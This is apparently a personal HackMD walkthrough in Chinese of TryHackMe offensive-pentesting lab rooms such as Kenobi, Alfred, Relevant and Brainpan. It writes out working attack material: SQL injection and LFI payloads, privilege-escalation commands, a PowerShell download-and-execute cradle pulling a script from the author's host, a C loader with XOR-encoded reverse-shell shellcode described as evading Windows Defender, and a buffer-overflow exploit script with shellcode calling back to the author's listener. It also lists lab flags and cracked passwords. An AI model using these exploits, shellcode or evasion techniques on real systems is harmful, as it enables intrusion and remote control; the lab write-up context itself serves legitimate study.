HackMD
Tryhackme Offensive Pentesting Walkthrough
這是我對 Tryhackme Offensive Pentesting 的學習紀錄 有人看到ㄉ話就借給你看ㄅXD
Getting Started
Kenobi
掃一下 看到開很多東西
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
枚舉一下SMB 可以看到有一個anonymous看起來很可疑 裡面有一個log.txt但可讀不可寫
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
看了一下log.txt 好像是生成id_rsa的紀錄 應該可以確認位置在/home/kenobi/.ssh/id_rsa
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
枚舉nfs 可以看到能掛載/var *
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
查了一下FTP的exploit 翻到有RCE的 但不能用
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
看了一下exploit 好像只是丟幾個能手打的payload讓檔案複製到某個地方
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
照打發現原來是沒有權限
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
突然想到剛剛有id_rsa的位置 直接複製到能掛載nfs的/var/tmp下
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
掛載nfs 然後把id_rsa複製回來 直接拿到kenobi的憑證 chmod 600 id_rsa以後就能直接連上了
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
提權
找SUID檔案 有一個檔案看起來很可疑 /usr/bin/menu
find / -perm -u=s -type f 2>/dev/null
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
直接運行 好像有很多種選項 這應該是user自己做的binary file
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
strings分析 發現有引用到其他的binary file 而且沒有設絕對路徑
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
直接蓋PATH就好了 簡單提到root
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Proof
user.txt
d0b0f3f53b6caa532a83915e19224899
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
root.txt
177b3cd8562289f37382721c28381f02
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Advanced Exploitation
Steel Mountain
看起來開很多Port(?
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
8080看起來有洞 查一下發現有RCE的exploit
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
改一下目標參數跟本地參數直接執行就能用了
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
換成CMD的shell
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
提權
跑winPEAS 找到bill的憑證
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
發現這幾個檔案很可疑
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
第一個路徑有空格的exe看起來能提權 用tasklist /v可以看到權限是N/A 應該是SYSTEM等級
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
查了一下 發現服務名稱是AdvancedSystemCareService9
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
在C:\Program Files (x86)\IObit\Advanced SystemCare下載shell.exe並更名為Advanced.exe
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
最後把服務重開就能提到SYSTEM了
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Proof
user.txt
b04763b6fcf51fcd7c13abc7db4fd365
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
root.txt
9af5f314f57607c00fd09803a587db80
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Alfred
8080看起來超級欠打
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
連上後發現是一個登入介面 但可以用admin:admin直接進去
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
進去以後點project>config 拉到最下面可以看到Execute Windows batch command 把指令改成\\10.13.41.118\meow\shell.exe 接著點Build執行 讓他吃到我們用Metasploit生成的shell.exe就能直接RCE了
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
提權
輸入whoami /priv發現有SeImpersonatePrivilege
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
直接上JuicyPotato.exe 雖然系統是Windows 7 Ultimate 但沒想到能用Windows 7 Enterprise的CLSID(?
JuicyPotato.exe -l 1337 -p shell.exe -t * -c {659cdea7-489e-11d9-a9cd-000d56965251}
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Proof
user.txt
79007a09481963edf2e1321abd9ae2a0
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
只能用metasploit開..
root.txt
dff0f748678f280250f25a45b8046b4a
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Hackpark
看起來是打Web
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
掃一下路徑 找到看起來像登入介面的URL 連上去是登入介面沒錯
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
拿hydra炸一下可以炸出一個憑證 登入進去就能看到Dashboard了
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
找一下exploit 可以翻到好幾個RCE的
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
RCE 非正規解
執行47011.py就能直接RCE了 只是shell有點醜
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
RCE 正規解
利用46353.cs
先把46353.cs的名字改成PostView.ascx 然後從發文的地方上傳
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
記得要把IP指向自己
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
點NEW > File Manager > Upload
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
上傳完成後訪問http://10.10.185.153/?theme=../../App_Data/files 就能RCE了
Privilege Escalation 非正規解
看到whoami /priv有SeImpersonatePrivilege這個Token 直接上馬鈴薯
Privilege Escalation 正規解
跑winPEAS可以看到一個可疑的檔案
它的服務無法重啟也無法重開機 解決方法是到他的目錄下的Event資料夾看Log 可以發現有一個程式會一直重複執行 (這誰想的到拉==
把Message.exe蓋掉就可以了
Proof
user.txt
759bd8af507517bcfaede78a21a73e39
root.txt
7e13d97f05f7ceb9881a3eb3d78d3e72
Gamezone
看起來是要打Web
進去以後左邊有一個登入的框框 隨便打一串admin' or 1=1 -- -的payload就進去了
進去以後可以看到有一個查詢的東西 感覺就是要做SQL Injection
稍微戳了一下整個資料庫 下面是Payload
1' UNION SELECT 1,2,3 -- -
1' UNION SELECT NULL,schema_name,NULL FROM information_schema.schemata -- -
1' UNION SELECT NULL,table_name,NULL FROM information_schema.tables WHERE table_schema="db" -- -
1' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name="users" -- -
這串看起來有戳到憑證
1' UNION SELECT NULL,username,pwd FROM db.users -- -
把Hash拿到cracktion.net可以噴出一串明文 拿這組憑證可以直接登入SSHagent47:videogamer124
Privilege Escalation 非正規解
看到User Group有lxd 直接想到可以lxd提權
先在本地下載 這個酷東西
然後到他的目錄下輸入sudo bash build-alpine
接著再根據這串指令做完就是root了
lxc image import ./alpine*.tar.gz --alias myimage
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
Privilege Escalation 正規解
跑linPEAS可以看到對面開一個10000 Port 在機器上 但外面會連不到 可以直接Tunnel出來打
第一種Tunnel方式
直接用chisel戳出來
chisel client 10.13.41.118:21 R:10000:127.0.0.1:10000
chisel server -p 21 --reverse
第二種Tunnel方式
從本地SSH上去
ssh -L 10000:localhost:10000 agent47@10.10.228.67
Tunnel連接好後就能直接訪問本地的10000 Port了 可以看到是一個登入介面 用剛剛的憑證可以登入agent47:videogamer124
拿nmap掃一下 可以看到CMS是Webmin 1.580 拿這個版本去找exploit可以翻到John Hammond的Github 把裡面的exploit載下來加個reverse shell就能用了
Proof
user.txt
649ac17b1480ac13ef1e4fa579dac95c
root.txt
a4b945830144bdd71908d12d902adeee
Skynet
看起來有蠻多東西的
連一下SMB的Share 在裡面翻到兩個檔案 其中一個像字典檔 另一個說是要改密碼 另一個登不進去
用enum4linux掃一下可以翻到一個Usermilesdyson
拿這個Usernmae再去掃SMB 但沒噴什麼東西出來 換打其他Port
掃一下80 感覺有幾個蠻可疑的東西 連上/squirrelmail發現是一個登入介面 拿剛剛的username跟wordlist炸一下可以噴一個憑證出來
拿這組憑證登入後可以看到三封信 第一封是SMB的密碼 第二封是binary code 拿去decode感覺是沒用的東西 第三封信感覺也沒用
可以用剛剛拿到的SMB憑證登入第二個SMB Share 在notes裡面有一個看起來很可疑的東西
milesdyson:)s{A&2Z=F^n_E.B`
把important.txt載下來看 第一個感覺是超可疑的路徑 連上後感覺沒什麼東西
對路徑掃下去 找到一條/administrator 進去以後看到是CuppaCMS 翻exploit 能找到一個LFI的
照著exploit做 可以成功LFI 嘗試戳一下RFI 結果成功RCE
http://10.10.165.183/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
提權
跑linPEAS 看到有一個backup.sh會以root權限排程執行
開backup.sh可以看到他跑到/var/www/html下打包一個東西 然後後面是星號 這東西可以被 這個 利用
Proof
user.txt
7ce5c2109a40f958099283600a9ae807
root.txt
3f0372db24753accc7179a282cd6a949
Daily Bugle
看起來就是要打80
隨便掃一下噴很多東西出來 到README.txt可以翻到他的版本 3.7多
找一下Joomla 3.7 exploit 可以翻到一個SQL Injection的 運行以後會噴出一組憑證
把Hash丟去給john炸一下憑證就噴出來了
拿這組憑證到登入頁面就能登入了
接下來一直找不到RCE的方式 直到找到了這篇文章 跟著做完就好了
但他選的模板不能RCE 要選Protostar才能RCE
橫向提權
跑linPEAS 翻到一串密碼 嘗試登入jjameson 發現可以登入
垂直提權
sudo -l發現有yum能用 去GTFOBins能找到相關的提權 按照sudo第二個方案做完就是root了
Proof
user.txt
27a260fe3cba712cfdedb1c86d80442e
root.txt
eec3d53292b1821868266858d7fa6f79
Overpass 2 - Hacked
用WireShark可以翻到上傳的路徑在/development/
對往upload.phpPOST的那條TCP Stream就能看到webshell了
對觸發Payload的下一條TCP Stream可以在裡面翻到兩邊傳輸的資料 sudo -l那部分就能看到密碼了
他裡面有從Github clone下來一個東西 直接過去看 發現是後門
把他cat的shadow整個拖下來用john炸 能炸出4個密碼
回去追原碼 可以發現他會把輸入的hash加salt 然後跟password做比較 如果一樣就會
拿攻擊者設置的Hash拚上程式裡面的salt拿hashcat炸就能噴出密碼了
掃一下目標機器 記得沒錯2222是後門開的 拿剛剛炸出來的憑證登入就可以了
ls -la看到一個.suid_bash 直接執行./.suid_bash -p就是root了
Proof
user.txt
thm{d119b4fa8c497ddb0525f7ad200e6567}
root.txt
thm{d53b2684f169360bb9606c333873144d}
Relevant
看起來應該是Web或SMB
vuln掃出來有MS17-010(?
非正規解
直接上MS17-010 用checker.py戳一下發現不能登入 用guest:guest也不行 但不知道為什麼smbclient就可以 而且還能從裡面下載檔案:(
passwords.txt裡面有被base64 encode過的字串 解開後發現是兩個憑證
把checker.py換成Bob的憑證就能找出能利用的pipe了 然後用msfvenom生成一個shell.exe 再執行send_and_execute.py 不過最後的時候會因為no respond所以沒有成功建立session
在之前打某個Lab時也有碰過類似的機器 這邊需要用到zzz_exploit.py 然後要修一下裡面的PoC
編輯zzz_exploit.py 然後把smb_pwn()這個Function裡面的指令改成自己要的 因為這個漏洞執行成功的話可以以System身分做Code Exeution 所以直接新增一個新的使用者就好了
接下來把登入憑證改成Bob的 然後執行 可以看到他雖然剛剛剛一樣no respond 但在輸出欄可以看到creating file c:\pwned.txt on the target 這代表剛剛的smb_pwn() Function有成功執行到 接下來直接RDP上去就行了
接著就是拿reverse shell回來本地 比較好做後續的操作
?__? 欸不是
本來想說用shellter直接繞過 但丟過去以後發現還是會被吃掉 所以又自己寫了一個reverse shell出來 有一部分是參考這篇文章
#include "Windows.h"
int main()
{
// msfvenom -p windows/x64/shell_reverse_tcp -a x64 -e x64/xor_dynamic LHOST=10.13.41.118 LPORT=443 -f c -b "\x00\x0a\x0d"
unsigned char meow[] =
"\xeb\x27\x5b\x53\x5f\xb0\x11\xfc\xae\x75\xfd\x57\x59\x53\x5e"
"\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\x81\x01"
"\x74\x07\x80\x3e\x11\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
"\xff\x14\x11\xe8\x5c\x97\xf0\xe4\xfc\xd4\x14\x14\x14\x55\x45"
"\x55\x44\x46\x45\x42\x5c\x25\xc6\x71\x5c\x9f\x46\x74\x5c\x9f"
"\x46\x0c\x5c\x9f\x46\x34\x5c\x9f\x66\x44\x5c\x1b\xa3\x5e\x5e"
"\x59\x25\xdd\x5c\x25\xd4\xb8\x28\x75\x68\x16\x38\x34\x55\xd5"
"\xdd\x19\x55\x15\xd5\xf6\xf9\x46\x55\x45\x5c\x9f\x46\x34\x9f"
"\x56\x28\x5c\x15\xc4\x9f\x94\x9c\x14\x14\x14\x5c\x91\xd4\x60"
"\x73\x5c\x15\xc4\x44\x9f\x5c\x0c\x50\x9f\x54\x34\x5d\x15\xc4"
"\xf7\x42\x5c\xeb\xdd\x55\x9f\x20\x9c\x5c\x15\xc2\x59\x25\xdd"
"\x5c\x25\xd4\xb8\x55\xd5\xdd\x19\x55\x15\xd5\x2c\xf4\x61\xe5"
"\x58\x17\x58\x30\x1c\x51\x2d\xc5\x61\xcc\x4c\x50\x9f\x54\x30"
"\x5d\x15\xc4\x72\x55\x9f\x18\x5c\x50\x9f\x54\x08\x5d\x15\xc4"
"\x55\x9f\x10\x9c\x5c\x15\xc4\x55\x4c\x55\x4c\x4a\x4d\x4e\x55"
"\x4c\x55\x4d\x55\x4e\x5c\x97\xf8\x34\x55\x46\xeb\xf4\x4c\x55"
"\x4d\x4e\x5c\x9f\x06\xfd\x43\xeb\xeb\xeb\x49\x5d\xaa\x63\x67"
"\x26\x4b\x27\x26\x14\x14\x55\x42\x5d\x9d\xf2\x5c\x95\xf8\xb4"
"\x15\x14\x14\x5d\x9d\xf1\x5d\xa8\x16\x14\x15\xaf\x1e\x19\x3d"
"\x62\x55\x40\x5d\x9d\xf0\x58\x9d\xe5\x55\xae\x58\x63\x32\x13"
"\xeb\xc1\x58\x9d\xfe\x7c\x15\x15\x14\x14\x4d\x55\xae\x3d\x94"
"\x7f\x14\xeb\xc1\x44\x44\x59\x25\xdd\x59\x25\xd4\x5c\xeb\xd4"
"\x5c\x9d\xd6\x5c\xeb\xd4\x5c\x9d\xd5\x55\xae\xfe\x1b\xcb\xf4"
"\xeb\xc1\x5c\x9d\xd3\x7e\x04\x55\x4c\x58\x9d\xf6\x5c\x9d\xed"
"\x55\xae\x8d\xb1\x60\x75\xeb\xc1\x5c\x95\xd0\x54\x16\x14\x14"
"\x5d\xac\x77\x79\x70\x14\x14\x14\x14\x14\x55\x44\x55\x44\x5c"
"\x9d\xf6\x43\x43\x43\x59\x25\xd4\x7e\x19\x4d\x55\x44\xf6\xe8"
"\x72\xd3\x50\x30\x40\x15\x15\x5c\x99\x50\x30\x0c\xd2\x14\x7c"
"\x5c\x9d\xf2\x42\x44\x55\x44\x55\x44\x55\x44\x5d\xeb\xd4\x55"
"\x44\x5d\xeb\xdc\x59\x9d\xd5\x58\x9d\xd5\x55\xae\x6d\xd8\x2b"
"\x92\xeb\xc1\x5c\x25\xc6\x5c\xeb\xde\x9f\x1a\x55\xae\x1c\x93"
"\x09\x74\xeb\xc1\xaf\xe4\xa1\xb6\x42\x55\xae\xb2\x81\xa9\x89"
"\xeb\xc1\x5c\x97\xd0\x3c\x28\x12\x68\x1e\x94\xef\xf4\x61\x11"
"\xaf\x53\x07\x66\x7b\x7e\x14\x4d\x55\x9d\xce\xeb\xc1\x81\x01";
void *exec = VirtualAlloc(0, sizeof meow, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, meow, sizeof meow);
((void(*)())exec)();
return 0;
}
到Windows拿VScode編譯過以後丟過去就不會被Defender吃掉了
剛剛突然想到 我已經是管理員了為什麼不把Defender關掉==
(補 剛剛先打一次的時候不小心把445打爛了 上面都是重製過的
(更2 又爛掉了:(
正規解
掃全Port可以看到有開49663跟49669 再針對下去掃可以看到49663是HTTPAPI 連上去發現是IIS
但如果把SMB的Share跟Share裡面的passwords.txt丟到路徑可以發現會戳出來
因為Server是IIS 所以可以上傳一個webshell來讓我們RCE
提權
因為有SeImpersonatePrivilege Token 所以直接用PrintSpoofer64.exe就能提到System了
Proof
user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}
root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
Internal
打Web
掃一下路徑 感覺是wordpress
嘗試戳admin:admin 但會被轉到internal.htm這個域名下
把Domain寫進hosts
拿WPscan掃 會發現一個使用者 炸一下就能炸出憑證了 可以直接登入
接著就都是套路 到Appearance > Theme Editor把404.php改成webshell以後再戳一下就shell了
橫向提權 1
在/opt下可以翻到幾個可疑的東西 wp-save.txt有一個憑證aubreanna:bubb13guM!@#123 可以直接提到aubreanna
橫向提權 2
跑linPEAS 看到有一個很可疑的服務開在8080 但只限制127.0.0.1連
直接用chisel把它通出來連
連上後發現是Jenkins 直接拿hydra炸可以噴一組憑證出來 可以直接登進去
進去以後點New Item > freestlye project > OK 然後拉到最下面 Build > Execute shell 在上面打reverse shell以後點save
接著點Build Now就可以收Reverse shell了
垂直提權
在/opt下可以找到一個note.txt 裡面有root的憑證root:tr0ub13guM!@#123 直接拿去登root就可以了
Proof
user.txt
THM{int3rna1_fl4g_1}
root.txt
THM{d0ck3r_d3str0y3r}
Buffer Overflow
Brainpan
隨便掃一下 看起來是要到10000 Port拿他的執行檔
拿dirsearch可以找到一個/bin 進去以後就可以把檔案載下來了
隨便寫了一個fuzzing的script 然後觀察兩邊 可以發現大概在600的時候目標會崩潰
#!/usr/bin/python3
from pwn import *
from time import sleep
count = 0
while True:
try:
count += 100
r = remote("192.168.0.18",9999)
print(f"Send {count} bytes string to target.")
r.sendline("A"*count)
time.sleep(1)
r.close()
except:
print("Unknow Error")
exit()
接著是找到EIP的offset 先用Metasploit下的一個工具來生成一串字
然後再隨便寫一個查offset的script
#!/usr/bin/python3
from pwn import *
r = remote("192.168.0.18",9999)
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
r.sendline(payload)
送出後可以看到EIP的值是35724134 再拿到patten_offset.rb查一下發現offset是524
接下來是找badchar 隨便寫一個sciprt 然後把offset +4蓋過EIP來讓輸入跑到ESP下面
對ESP選Follow in Dump可以看到剛剛丟進去的payload 但看起來沒有badchar就是了
用mona看有沒有可以利用的modules 發現brainpan.exe他自己本身沒有防護
查一下在brainpan.exe裡面有沒有JMP ESP的記憶體位置 發現有一個
最後刻一個exploit.py出來
#!/usr/bin/python3
from pwn import *
r = remote("192.168.0.18",9999)
offset = b"A"*524
nop = p32(0x90909090)*15
ret_addr = p32(0x311712f3)
#msfvenom -p windows/shell_reverse_tcp -a x86 -e x86/shikata_ga_nai -i 3 LHOST=192.168.0.23 LPORT=443 EXITFUNC=thread -f python -b "\x00"
buf = b""
buf += b"\xda\xcc\xd9\x74\x24\xf4\x58\xbd\x0b\xf6\xb2\x86\x2b"
buf += b"\xc9\xb1\x5f\x31\x68\x19\x03\x68\x19\x83\xc0\x04\xe9"
buf += b"\x03\x0a\x6c\x70\x4b\xd9\xac\x4a\x55\x6a\x6b\xbe\x3c"
buf += b"\xa2\xba\x8f\x99\x47\xfe\xeb\x28\x0a\xee\xf0\x08\x9b"
buf += b"\xf2\xe9\xca\xe4\x99\xbe\x8e\x6e\x6d\xfc\x72\xbd\x69"
buf += b"\x63\x23\xb3\x38\xd6\x53\xca\x9e\x9a\xf1\x3b\xa8\xac"
buf += b"\x72\xf9\x26\x06\x3e\x17\x13\x68\xa4\xb3\x41\x27\xbe"
buf += b"\x45\x78\xda\x38\x4b\x3e\x1f\xf1\x3d\xf1\x2a\x91\xb1"
buf += b"\x9f\xfc\xd9\x0d\x75\xda\x06\x44\x38\x1b\xdc\xae\x55"
buf += b"\xf1\xf8\x90\xf4\xdf\xb4\x02\xa3\x5f\xb5\x53\x73\xc9"
buf += b"\x5c\x6b\x16\x3a\x7c\xe0\x8a\x15\xee\x1b\x93\x29\x38"
buf += b"\xe9\xf5\xff\x43\xb5\x0f\x3b\x47\xd2\xe0\xba\xc4\x5e"
buf += b"\x48\x26\xcd\x16\x66\xc0\xb6\x97\x30\x41\x6a\x2f\x69"
buf += b"\xcd\x8d\x22\xd3\x49\xf8\x12\xfd\xf9\x36\x02\x3a\x9d"
buf += b"\xbe\x2d\xbc\xee\x2f\x46\x3c\xa4\xf7\x4f\xf5\xaa\xe7"
buf += b"\xbd\xb0\x36\xd9\xb4\xb3\x40\x3e\xaf\x4b\xdd\xce\xb9"
buf += b"\xc2\x87\x78\xe1\x01\xbf\xba\x8c\xb5\x40\x6f\x58\x5d"
buf += b"\x8e\x5c\x77\xc8\x9c\xe0\xe1\x45\xc0\xc2\xd6\x69\x19"
buf += b"\xb1\xe4\x19\x59\x1c\x59\x1f\xb3\x22\xf8\x6c\xab\xa9"
buf += b"\x2c\x10\x15\x75\xba\xb5\x55\xa8\x36\x64\x97\x2e\x9a"
buf += b"\x27\xfd\xc7\x13\xa3\xe8\x29\x5d\xee\x59\xa0\xb5\x4e"
buf += b"\xb6\xfa\xda\x6d\x03\x93\x56\x59\x1e\x32\x98\x8f\xa0"
buf += b"\x92\x69\x21\xeb\x37\x4a\x5d\xf4\x52\x28\x93\x7c\x7c"
buf += b"\xe0\x5f\x71\x93\x75\x21\x53\x25\xb4\x80\xfc\x0b\x59"
buf += b"\x0c\xe6\x96\xd0\x5a\xc0\xd7\x10\x12\x52\x07\xb4\x48"
buf += b"\x9a\x34\xbb\x18\x3c\xc7\x8a\x05\xc5\x86\xc2\x63\x4f"
buf += b"\x2a\xe4\x3a\xd4\x3d\x74\xc1\x48\x7d\x62\x77\x53\xbc"
buf += b"\x59\x31\x9f\x03\x8b\x38\x38\xb7\xa4\x0b\x20\xbb\xd9"
buf += b"\xb4\x0a\x4f\x8d\x8d\x33\xdf\x3a\x4c\x3c\x22\xfd\xa8"
buf += b"\x4b\xf8\x71\x13\x1d\xb5\x6b\xb3\x47\x28\x21\x0b\xdb"
buf += b"\xc2\xc7\xad\xbc\xb3\xc6\x9c\x71\x95\xec\xf9\xec\xce"
buf += b"\xf2\x8d"
shellcode = buf
payload = offset + ret_addr + nop + shellcode
r.sendline(payload)
成功RCE
接下來就改一下目標的IP跟LHOST就能搬到隔壁去用了 但這作業系統是什麼鬼 Z槽??
到根目錄下才發現是linux 但這shell是什麼鬼==
思考ㄌ一分鐘突然想到 msfvenom生的是windows的shellcode 這邊是linux 但執行的起來也是蠻酷的==
把payload換成linux/x86/shell_reverse_tcp就沒事了
sudo -l可以發現可以執行一個檔案不用密碼
執行以後發現有幾個選項 應該是自訂讀取的東西 第三個manual選項看起來很可疑 或許可以直接spawn shell?
輸入sudo /home/anansi/bin/anansi_util manual /bin/sh結果跑到一個神奇的畫面(?
歐原來是man 好像會直接把manual後面接的東西當作查詢的參數 到GTFOBins找一下有沒有spawn shell的 發現有一個
先輸入sudo /home/anansi/bin/anansi_util manual man以後再輸入!/bin/sh就是root了
Active Directory
Attacktive Directory
可以用enum4linux枚舉SMB
NetBIOS Domain name: THM-AD
用Kerbrute來枚舉user
用impacket-GetNPUsers拿不需要密碼的Kerberos 5 Hash
放到john炸一下就出來了
拿他登入SMB的backup以後可以拿到base64 encode過的第二個憑證
拿這組憑證可以用impacket-secretsdump翻所有人的NTLM
用evil-winrm可以直接拿Administrator的NTLM登入
Extra Credit
Corp
一直按上就可以看到FLAG了
setspn -T medin -Q */* 可以看到fela
先在本地開HTTP Server 然後讓目標自己連回來拿Invoke-Kerberoast.ps1
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://10.17.5.224/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
執行完後開啟kerb-Hash0.txt就能看到Hash了
複製回家用Hashcat炸 可以噴一個密碼出來
hashcat -m 13100 {hashfile} {wordlist}
這樣可以拿到一個憑證fela:rubenF124 直接連RDP就能拿到FLAG
xfreerdp +drives /u:fela /p:rubenF124 /v:10.10.117.61
把PowerUp.ps1丟過去執行
運行以後可以看到一條路徑 打開就能看到一串base64 encode過的東西 解密過後就拿到密碼了Administrator:tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$T
直接RDP上去 登入Administrator的時候他會要你修改密碼 改成自己記的起來的就好了
xfreerdp +drives /u:Administrator /p:"tqjJpEX9Qv8ybKI3yHcc=L\!5e(\!wW;\$T" /v:10.10.117.61
FLAG THM{g00d_j0b_SYS4DM1n_M4s73R}
Mr.Robot
應該是打Web
掃一下路徑 發現是Wordpress 進robots.txt可以看到兩個奇怪的路徑
進去fsocity.dic可以下載一個檔案 感覺這是一個字典檔 但裡面超多混淆的東西
可以用sort跟uniq除混淆
接下來是爆破憑證 但username的由來真的超迷 幾乎每個Write up都說是憑空生出來的 不知道怎麼用技術的手段把username試出來:(
輸入elliot當作username就能拿到登入失敗的文字了
能用WPscan直接把憑證炸出來elliot:ER28-0652
wpscan --url http://10.10.214.246/ --usernames elliot --passwords wordlist.txt
拿這組憑證就能直接進Dashboard了 接下來到Appearance > Editor 把404.php改成reverse shell後隨便亂戳就能RCE了
橫向提權
到/home/robot下面可以看到有一個叫password.raw-md5的檔案 把裡面的Hash丟到Cracktion.net就能爆出密碼了
垂直提權
找SUID檔案 發現有nmap
nmap --interactive
!sh
Flag
key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
key-2-of-3.txt
822c73956184f694993bede3eb39f959
key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Retro
看起來要打80
用raft-medium-directories.txt這個字典檔能掃到/retro
往下繼續掃可以掃到很多東西
進/wp-admin的話他會把我們重定向到localhost 所以改一下hosts
拿wpscan可以掃出一個叫wade的使用者
接下來用cewl對它的網站產一個字典檔出來 深度是3 用這個字典檔配wpscan的爆破可以炸出一個憑證wade:parzival
這串憑證可以登入wordpress的dashboard
到Theme Editor把404.php改成訪問到我們reverse shell的php
但不知道為什麼試了很多次都不行 嘗試把剛剛的憑證丟到RDP裡面就能登入了
xfreerdp +drives /u:wade /p:parzival /v:10.10.123.111
丟shell.exe過去 發現會被Defender吃掉
